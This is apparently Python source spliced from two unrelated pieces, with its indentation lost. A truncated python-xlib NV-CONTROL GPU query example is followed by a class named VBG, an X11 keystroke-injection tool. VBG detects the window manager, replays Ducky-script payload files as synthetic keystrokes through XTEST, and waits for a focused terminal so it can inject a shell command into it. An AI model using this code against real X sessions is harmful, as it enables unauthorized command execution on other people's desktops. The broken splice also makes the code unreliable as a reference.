# Change path so we find Xlib
from pprint import pprint
from Xlib.display import Display
from Xlib.ext.nvcontrol import Gpu, Cooler
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
if __name__ == '__main__':
display = Display()
# Check for extension
if not display.has_extension('NV-CONTROL'):
sys.stderr.write('{}: server does not have the NV-CONTROL extension\n'.format(sys.argv[0]))
ext = display.query_extension('NV-CONTROL')
print(ext)
sys.stderr.write("\n".join(display.list_extensions()))
if ext is None:
sys.exit(1)
gpu = Gpu(0)
fan = Cooler(0)
perf_level = 3
dic = {
'get_gpu_count': display.nvcontrol_get_gpu_count(),
'get_vram': display.nvcontrol_get_vram(gpu),
'get_irq': display.nvcontrol_get_irq(gpu),
'supports_framelock': display.nvcontrol_supports_framelock(gpu),
'get_core_temp': display.nvcontrol_get_core_temp(gpu),
'get_core_threshold': display.nvcontrol_get_core_threshold(gpu),
class VBG(object):
def __init__(self):
self.display = Display()
self.term_windows = []
self.term_strings = ("xterm")
self.cmd = " " * 5 + ";{};exit;".format("echo w00t w00t")
self.default_delay = 0.05
self.control_key_map = {
"ESC": XK.XK_Escape,
"ALT": XK.XK_Alt_L,
"WINDOWS": XK.XK_Super_L,
"ENTER": XK.XK_Return,
"CONTROL": XK.XK_Control_L,
"DOLLAR": XK.XK_dollar,
"SHIFT": XK.XK_Shift_L,
"F2": XK.XK_F2
}
self.map = {}
for keysym in range(0, 65535):
symbol = self.display.lookup_string(keysym)
if symbol != None:
self.map[symbol] = keysym
if args.mode == "cmd":
if not "XTEST" in self.display.list_extensions():
print(
"[E] - XTEST Extension Not Supported. Maybe Connect With `ssh -Y`.",
file=sys.stderr)
sys.exit(2)
elif not args.passive and args.payload:
self.injectWMCmd(args.payload)
sys.exit(0)
elif not args.passive:
wm = self.detectEnvironment()
if wm:
payloads = glob.glob("payloads/{}_payload*".format(
wm.split()[0].lower()))
if not payloads:
print("[E] No Suitable Payload Found.")
sys.exit(1)
for wm_payload in payloads:
self.injectWMCmd(wm_payload)
sys.exit(0)
else:
print("[-] - Falling Back to Passive Mode.")
print("[+] - Trying Passive Mode.")
self.findTerms(self.display, self.display.screen().root)
self.waitFocusAndInjectCmd(self.term_strings)
else:
print("[E] - Unsupported Mode.")
sys.exit(1)
def detectEnvironment(self):
print("[+] - Detecting Window Manager.")
cmd = "wmctrl -m"
output = subprocess.check_output(cmd.split()).splitlines()
wm = output[0].decode("ascii").split(" ", maxsplit=1)[1]
if not wm:
print(
"[-] - Could Not Detect Environment. Check if wmctrl is Installed."
)
return None
wm = wm.strip()
print("[+] - Window Manager {} Detected.".format(wm.strip()))
return wm
def injectWMCmd(self, payload_file):
print("[+] - Running Payload from File {}.".format(payload_file))
f = open(payload_file, "r")
payload = self.parseDuck(f)
for p in payload:
if type(p) == float:
time.sleep(p)
continue
bytes_payload = " ".join([str(x) for x in p]).encode("ascii")
proc = subprocess.Popen(["./write_cmd"],
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(proc.communicate(input=bytes_payload)[0].decode("ascii"))
time.sleep(self.default_delay)
#os.system("./write_cmd '{}'".format(self.cmd))
def mapKey(self, key):
if key in self.control_key_map:
return self.control_key_map[key]
keysym = XK.string_to_keysym(key)
if keysym != 0:
return keysym
return self.map.get(key, None)
def parseDuck(self, script):
payload = []
for line in script:
line = line.strip("\n")
split_line = line.split(" ", maxsplit=1)
instr = split_line[0]
if instr == "STRING":
arg = split_line[1]
keycodes = []
for ch in arg:
keysym = self.mapKey(ch)
if not keysym:
print(
"[E] - Parse Error. Character \"{}\" has no Valid Keysym."
.format(ch))
sys.exit(1)
#print("{} -> kc:{} ksym:{}".format(ch, self.display.keysym_to_keycode(keysym), keysym))
keycodes.append(self.display.keysym_to_keycode(keysym))
keycodes.append(self.display.keysym_to_keycode(keysym))
payload.append(keycodes)
elif "-" in instr:
keycodes = []
key = instr.split("-")
if len(key) != 2:
print(
"[E] - Parse Error. \"{}\" Composition Length is Unsupported (max 2 keys)."
.format(instr))
sys.exit(1)
keycode1, keycode2 = tuple(
map(self.display.keysym_to_keycode, map(self.mapKey, key)))
if keycode1 and keycode2:
keycodes.append(keycode1)
keycodes.append(keycode2)
keycodes.append(keycode2)
keycodes.append(keycode1)
else:
print("[E] - Parse Error. \"{}\" Unsupported Composition.".
format(instr))
sys.exit(1)
payload.append(keycodes)
elif instr in self.control_key_map:
keycode = self.display.keysym_to_keycode(
self.control_key_map[instr])
payload.append([keycode])
elif instr == "REM":
continue
elif instr == "DELAY":
arg = split_line[1]
try:
delay = float(arg)
except:
print("[E] - Parse Error. \"{}\" is not a Valid Delay.".
format(arg))
sys.exit(1)
payload.append(delay)
elif instr == "REPEAT":
arg = split_line[1]
try:
repetitions = int(arg)
except:
print(
"[E] - Parse Error. \"{}\" is not a Valid Number of Repetitions."
.format(arg))
sys.exit(1)
payload.append(payload[-1] * repetitions)
else:
print(
"[E] - Parse Error. \"{}\" is not a Supported Instruction."
.format(instr))
sys.exit(1)
return payload
def findTerms(self, display, window):
children = window.query_tree().children
win_class = window.get_wm_class()
win_name = window.get_wm_name()
if win_class != None and win_class[0] in "".join(self.term_strings):
#if "root@" in win_name:
self.term_windows.append(window)
for w in children:
self.findTerms(self.display, w)
def waitFocusAndInjectCmd(self, term_strings):
print("[+] - Waiting Focus on a Terminal Window...")
while True:
focused_window = self.display.get_input_focus().focus
focused_window_name = focused_window.get_wm_name()
focused_window_class = focused_window.get_wm_class()
if focused_window_class == None:
continue
if focused_window_class[0] in "".join(term_strings):
if re.match("[a-zA-Z]+[a-zA-Z0-9]*", focused_window_name):
os.system("./write_cmd '{}'".format(self.cmd))
break
time.sleep(self.default_delay)